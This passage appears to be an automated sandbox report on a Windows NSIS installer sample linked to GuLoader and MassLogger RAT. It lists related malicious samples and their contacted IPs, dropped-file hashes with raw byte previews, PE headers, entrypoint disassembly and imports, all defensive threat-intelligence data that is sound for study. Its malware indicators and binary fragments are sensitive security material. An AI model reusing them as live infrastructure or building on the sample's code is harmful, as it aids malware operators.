                                                                                    lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    3b5074b1b5d032e5620f69f9f700ff0eZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    JuIZye2xKX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 149.154.167.220
                                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    ZFCKpFXpzx.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    37f463bf4616ecd445d4a1937da06e19ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 142.250.185.129
                                                                                    • 216.58.206.46
                                                                                    grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 142.250.185.129
                                                                                    • 216.58.206.46
                                                                                    14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 142.250.185.129
                                                                                    • 216.58.206.46
                                                                                    Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 142.250.185.129
                                                                                    • 216.58.206.46
                                                                                    lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 142.250.185.129
                                                                                    • 216.58.206.46
                                                                                    AM983ebb5F.exeGet hashmaliciousGuLoaderBrowse
                                                                                    • 142.250.185.129
                                                                                    • 216.58.206.46
                                                                                    av8XPPpdBc.exeGet hashmaliciousGuLoaderBrowse
                                                                                    • 142.250.185.129
                                                                                    • 216.58.206.46
                                                                                    QNuQ5e175D.exeGet hashmaliciousGuLoaderBrowse
                                                                                    • 142.250.185.129
                                                                                    • 216.58.206.46
                                                                                    7uY105UTJU.exeGet hashmaliciousGuLoaderBrowse
                                                                                    • 142.250.185.129
                                                                                    • 216.58.206.46
                                                                                    QNuQ5e175D.exeGet hashmaliciousGuLoaderBrowse
                                                                                    • 142.250.185.129
                                                                                    • 216.58.206.46
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    C:\Users\user\AppData\Local\Temp\nse90B2.tmp\System.dllZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        4AMVusDMPP.exeGet hashmaliciousGuLoaderBrowse
                                                                                          WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            WGi85dsMNp.exeGet hashmaliciousGuLoaderBrowse
                                                                                              czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        Process:C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2560x2560, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):484658
                                                                                                        Entropy (8bit):7.809711763657168
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:W1S3xo63wl4biprI2S4WwWEcwxg9dvVAxZOCLF0DB:Wo3xX3y4bz2lWwWo6rSTZyd
                                                                                                        MD5:5C727AE28F0DECF497FBB092BAE01B4E
                                                                                                        SHA1:AADE364AE8C2C91C6F59F85711B53078FB0763B7
                                                                                                        SHA-256:77CCACF58330509839E17A6CFD6B17FE3DE31577D8E2C37DC413839BA2FEEC80
                                                                                                        SHA-512:5246C0FBA41DF66AF89D986A3CEABC99B61DB9E9C217B28B2EC18AF31E3ED17C865387223CEB3A38A804243CF3307E07E557549026F49F52829BEBC4D4546C40
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview:......JFIF.....,.,.....]http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5, 2022/05/09-07:22:29 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmp:CreateDate="2018-04-27T15:00:27+08:00" xmp:ModifyDate="2022-09-22T14:01:54+08:00" xmp:MetadataDate="2022-09-22T14:01:54+08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:b728d5c8-8822-6d4c-afc1-a393cb2a04ec"
                                                                                                        Process:C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):82187
                                                                                                        Entropy (8bit):4.587500544284946
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:lTZf23K1a7wxwgK5hHPeBSZdU3O04zV4JiUFThTU1v38rrjDCLaJ6mKK7ckXLhAg:lT12yoASE8CJtVTK3UTxs8Sg
                                                                                                        MD5:AD2D7A674C4C9CB91F89D8E03FE5C993
                                                                                                        SHA1:17C8A5862DBABA28424F66FA18AB612CA645AA76
                                                                                                        SHA-256:6CD343DF53989BF2D8F1D82722032DB666D44D270EFCAED7129090FB312A45E6
                                                                                                        SHA-512:9F3B3B979F6FA955BF99D3266D94FFFAD5BC25FB9B924A1C8607E86F0D8F9DF91445F84F1317051DC19FF6B5F83A32A50D25D4A1646CE1F4565736DCE9A5193B
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:....}.......................+...................................................B...........................5.............hh.......................llllll.....ccccc.....V....55.tttt.........................C..5.A..S.`..AAAAAA.....i....QQ.........P......CCCCC...........WW...%%%%%%....e..............''...........q.....W......C...____.................#.........6.....\.............(............h....''.... ......................WW....AAA........9....E......e..GGGGG.................."......................................*............ff.aa.....tt.L.....eee.....................+..........................................EE......................gg..............................................%%%.A................D...........C............%.}}.UU......................ii.................. .L...u...................YYY.H..}}.^^.>.BB...{......EE......\\\..........R...............................ff....\\..........||||...aaaa..^^^^^..........C.................IIIII.............................Y.F.....
                                                                                                        Process:C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):112291
                                                                                                        Entropy (8bit):1.249420131631438
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:5R+BCpkJWjYWL2MxTVLvUjpGqik9JiAfWA2DBQwD1PzUH+HYZmIo7x31sT:WCZY21w0I2NZYD
                                                                                                        MD5:4D1D72CFC5940B09DFBD7B65916F532E
                                                                                                        SHA1:30A45798B534842002B103A36A3B907063F8A96C
                                                                                                        SHA-256:479F1904096978F1011DF05D52021FAEEE028D4CF331024C965CED8AF1C8D496
                                                                                                        SHA-512:048844A09E291903450188715BCDDF14F0F1F10BEAFBD005882EBF5D5E31A71D8F93EEBE788BD54B4AED2266C454F4DCA18AF4567977B7E773BBE29A38DEA45B
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview:..........P............+......................................................................................................................X......n..(................G...................................m.........|.......................U.............`............l..............@}.........a........................................s............y.................N...............B...............w.e..........................................Q......*...................................................................................................a...........................f..................p..................t...........................................9.Q................@....................e................................................................:..............P.......S.........................P........................9..............._.......................(...............N............................................................H.T..........c..............................
                                                                                                        Process:C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):362089
                                                                                                        Entropy (8bit):1.23992084267325
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:xOeaameETrlE0+1mGOWb3h5WAV0hW+JSLSwzj2HlSdL0f6mhKZRaqOzWz6szt3cA:x+ds5dYOVxIW3hhdeRt6MeZ1W4vB
                                                                                                        MD5:A4340182CDDD2EC1F1480360218343F9
                                                                                                        SHA1:50EF929FEA713AA6FCC05E8B75F497B7946B285B
                                                                                                        SHA-256:B91E5B1FF5756F0B93DCF11CBC8B467CDA0C5792DE24D27EC86E7C74388B44B3
                                                                                                        SHA-512:021F198AFF7CCED92912C74FC97D1919A9E059F22E99AB1236FBAA36C16B520C07B78F47FC01FCFAC1B53A87CDAE3E440D0589FA2844612617FAB2EDB64A3573
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview:..........F.............................i.....................B.........................................b..Et.............................O...........h...............................................................................8..........n.....................w.................../.......|.......'........,..........(...........................W......#..................................................................................................=..........................]..........q................................................[.................2....S............................"...................................$!..............................=.......................................[f.................................................................................................................V.............................w...................................................$.............................................................j...........h.............J..............
                                                                                                        Process:C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        File Type:FoxPro FPT, blocks size 22, next free block index 285212672, field type 0
                                                                                                        Category:dropped
                                                                                                        Size (bytes):139354
                                                                                                        Entropy (8bit):1.2473328695625903
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:9OsMSh8lSnJGyUzWZsO2ipzPFmDZC9kpzroto48tf2+5lVp:9delFlqNawgJp
                                                                                                        MD5:B0FB6B583D6902DE58E1202D12BA4832
                                                                                                        SHA1:7F585B5C3A4581CE76E373C78A6513F157B20480
                                                                                                        SHA-256:E6EA5F6D0C7F5FA407269C7F4FF6D97149B7611071BF5BF6C454B810501AE661
                                                                                                        SHA-512:E0894FFBD76C3476DC083DAFD24F88964BF6E09E4CA955766B43FE73A764A00247C930E9996652A22B57B27826CD94F88B8178514060CA398DE568675F9E4571
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview:.......................................|...................................................................+................$......&....A........................................................Z.....................................A...............!.....Y........................l..........9..................c.............f.................F...".................................................h.......................................\..............J............................5......t.....E.................q........................:......^....................................................................................I..........................................................x......W....................................................................................M...........................X..............................,..................m.......................................................................................................................J........ ...F...........
                                                                                                        Process:C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):276296
                                                                                                        Entropy (8bit):7.772463859530026
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:968ENVGVOEVYMieviL5xEgopRlm16xQFtP3sJM5zQ9N:9/ENsVOESDec5GRlosJczQz
                                                                                                        MD5:F6AD06A95089556FEC6BC8D248E01EF7
                                                                                                        SHA1:9C3EC9838644EA362990222672BFEB857D02E3E3
                                                                                                        SHA-256:E7D5F3AD1B0D29AF8DCC29144F423A4328CC588F742A02630C90D7DEEF1C4BE3
                                                                                                        SHA-512:54FF1678EC6CAD600D727CB1DDB9DAA462A23A5791F112588C769104341123FFB4C45F356A3395D2012B0A16B1C67CBCF4FD1F34126346888C578EA396F9D316
                                                                                                        Malicious:false
                                                                                                        Preview:........GG...................HH.Q........}}...........................{..6.........RR...E.'..........]]...EE.MM.;.. .................u.......//.............K.&&&&.....aaaaa......@@@.___.iii.$$..........II..1..(.......DD..GGG.....y........r....}...!..........}}.k..............t......z....H......CC..B......................................ss...........-........._..............C.'.ccc............?.|...33333.~..llll.............j...K.<.......I....""...2.xx.g..................................k..I.?...;....q..........c...8............88.``....e.....YY.......................7.5555555....................QQ..................#..............A..........'..r.._.......~~~~.Q.\.............B.%.....UU..../.ii.........uuu.mmmmm.a......0........................................9.....#####.....J........u....~....vv..A..44.....8.........k............-.5..}...................j.............!!!.....XXX.....kkk....i.~.EE. .....................(..............P..QQ..Z..........................JJ......b..g........
                                                                                                        Process:C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):12288
                                                                                                        Entropy (8bit):5.719859767584478
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                                                        MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                                                        SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                                                        SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                                                        SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                                                        Malicious:false
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: ZaRP7yvL1J.exe, Detection: malicious, Browse
                                                                                                        • Filename: 4AMVusDMPP.exe, Detection: malicious, Browse
                                                                                                        • Filename: 4AMVusDMPP.exe, Detection: malicious, Browse
                                                                                                        • Filename: WGi85dsMNp.exe, Detection: malicious, Browse
                                                                                                        • Filename: WGi85dsMNp.exe, Detection: malicious, Browse
                                                                                                        • Filename: czHx16QwGQ.exe, Detection: malicious, Browse
                                                                                                        • Filename: rXKfKM0T49.exe, Detection: malicious, Browse
                                                                                                        • Filename: b5BQbAhwVD.exe, Detection: malicious, Browse
                                                                                                        • Filename: 9Yn5tjyOgT.exe, Detection: malicious, Browse
                                                                                                        • Filename: 6ZoBPR3isG.exe, Detection: malicious, Browse
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1483092
                                                                                                        Entropy (8bit):5.46659686299126
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:9rDlMosJcbo3xX3y4bz2lWwWo6rSTZyQ6:7PoBXbz2luo6rS1yB
                                                                                                        MD5:D6102601869F9C2585F563EA56C429BD
                                                                                                        SHA1:3E48554E7B89909E14B7F8147E114C231082A489
                                                                                                        SHA-256:37205018756248334057C7BA2E2C9152EB21F455680F3341B460C2DB43D5BDB6
                                                                                                        SHA-512:E10BD25EC5FD9BBE00BA0D0E2AB3BC191BDE34E1466610A5F06D9EF50E9E6170F4CAD7EB93EC0DDEE5DE479B18327D502DD188A83FADF49A15749BA009D6B17F
                                                                                                        Malicious:false
                                                                                                        Preview:B6......,.......,.......\........!.......4.......5..........................M...i............................H..............................................................................................................................................................................G...J...............h...............................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                        Entropy (8bit):7.959597258531055
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:c7WJL1gt32.exe
                                                                                                        File size:1'017'781 bytes
                                                                                                        MD5:7549ee46b6e4391bb5d33788fb901e8d
                                                                                                        SHA1:d37b7af1fd0bbb25904818f93b4f992af8631fdd
                                                                                                        SHA256:08972ea67ce0756e8af06aeea9628d2ec00392351f8aaaf69cde005f79d74051
                                                                                                        SHA512:294de0650592e91a5bbd6d5311898a0a7d6093fc0645f096904abe54e050788e1b5c0448db85a1e6b443b979d600c4912b48fc278d8792f7a5ad7b94d313cae6
                                                                                                        SSDEEP:24576:9jwKCNW7eeGnMYvkx0qqFu6zd9qPvFwkAMZCnJOaqZKNK:V1Cc7nG5Maq0H+9wkjKoH+K
                                                                                                        TLSH:3325230E72618D03C4718E76AA27955F727DAF6B4D2667C32341386E6E3F38D0C72694
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.....
                                                                                                        Icon Hash:46224e4c19391d03
                                                                                                        Entrypoint:0x4034a5
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x5C157F24 [Sat Dec 15 22:24:36 2018 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:4
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:4
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:4
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                                                                                                        Instruction
                                                                                                        sub esp, 000002D4h
                                                                                                        push ebx
                                                                                                        push esi
                                                                                                        push edi
                                                                                                        push 00000020h
                                                                                                        pop edi
                                                                                                        xor ebx, ebx
                                                                                                        push 00008001h
                                                                                                        mov dword ptr [esp+14h], ebx
                                                                                                        mov dword ptr [esp+10h], 0040A230h
                                                                                                        mov dword ptr [esp+1Ch], ebx
                                                                                                        call dword ptr [004080ACh]
                                                                                                        call dword ptr [004080A8h]
                                                                                                        and eax, BFFFFFFFh
                                                                                                        cmp ax, 00000006h
                                                                                                        mov dword ptr [0042A24Ch], eax
                                                                                                        je 00007FC729450C63h
                                                                                                        push ebx
                                                                                                        call 00007FC729453F2Dh
                                                                                                        cmp eax, ebx
                                                                                                        je 00007FC729450C59h
                                                                                                        push 00000C00h
                                                                                                        call eax
                                                                                                        mov esi, 004082B0h
                                                                                                        push esi
                                                                                                        call 00007FC729453EA7h
                                                                                                        push esi
                                                                                                        call dword ptr [00408150h]
                                                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                                                        cmp byte ptr [esi], 00000000h
                                                                                                        jne 00007FC729450C3Ch
                                                                                                        push 0000000Ah
                                                                                                        call 00007FC729453F00h
                                                                                                        push 00000008h
                                                                                                        call 00007FC729453EF9h
                                                                                                        push 00000006h
                                                                                                        mov dword ptr [0042A244h], eax
                                                                                                        call 00007FC729453EEDh
                                                                                                        cmp eax, ebx
                                                                                                        je 00007FC729450C61h
                                                                                                        push 0000001Eh
                                                                                                        call eax
                                                                                                        test eax, eax
                                                                                                        je 00007FC729450C59h
                                                                                                        or byte ptr [0042A24Fh], 00000040h
                                                                                                        push ebp
                                                                                                        call dword ptr [00408044h]
                                                                                                        push ebx
                                                                                                        call dword ptr [004082A0h]
                                                                                                        mov dword ptr [0042A318h], eax
                                                                                                        push ebx
                                                                                                        lea eax, dword ptr [esp+34h]
                                                                                                        push 000002B4h
                                                                                                        push eax
                                                                                                        push ebx
                                                                                                        push 004216E8h
                                                                                                        call dword ptr [00408188h]
                                                                                                        push 0040A384h
                                                                                                        Programming Language:
                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x550000x21068.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x10000x64090x6600bfe2b726d49cbd922b87bad5eea65e61False0.6540287990196079data6.416186322230332IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                        .rdata0x80000x13960x1400d45dcba8ca646543f7e339e20089687eFalse0.45234375data5.154907432640367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .data0xa0000x203580x6008575fc5e872ca789611c386779287649False0.5026041666666666data4.004402321344153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .ndata0x2b0000x2a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .rsrc0x550000x210680x2120003ed2ed76ba15352dac9e48819696134False0.8714696344339623data7.556190648348207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                        RT_BITMAP0x554c00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                        RT_ICON0x558280xc2a3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9966684729162903
                                                                                                        RT_ICON0x61ad00x86e0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.990210843373494
                                                                                                        RT_ICON0x6a1b00x5085PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9867559307233299
                                                                                                        RT_ICON0x6f2380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4358921161825726
                                                                                                        RT_ICON0x717e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4896810506566604
                                                                                                        RT_ICON0x728880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5367803837953091
                                                                                                        RT_ICON0x737300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6913357400722022
                                                                                                        RT_ICON0x73fd80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.38597560975609757
                                                                                                        RT_ICON0x746400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4934971098265896
                                                                                                        RT_ICON0x74ba80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.651595744680851
                                                                                                        RT_ICON0x750100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.46908602150537637
                                                                                                        RT_ICON0x752f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5472972972972973
                                                                                                        RT_DIALOG0x754200x120dataEnglishUnited States0.53125
                                                                                                        RT_DIALOG0x755400x118dataEnglishUnited States0.5678571428571428
                                                                                                        RT_DIALOG0x756580x120dataEnglishUnited States0.5104166666666666
                                                                                                        RT_DIALOG0x757780xf8dataEnglishUnited States0.6330645161290323
                                                                                                        RT_DIALOG0x758700xa0dataEnglishUnited States0.6125
                                                                                                        RT_DIALOG0x759100x60dataEnglishUnited States0.7291666666666666
                                                                                                        RT_GROUP_ICON0x759700xaedataEnglishUnited States0.6091954022988506
                                                                                                        RT_VERSION0x75a200x308dataEnglishUnited States0.47036082474226804
                                                                                                        RT_MANIFEST0x75d280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                        DLLImport
                                                                                                        KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                        USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                        SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                        ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                        EnglishUnited States
                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
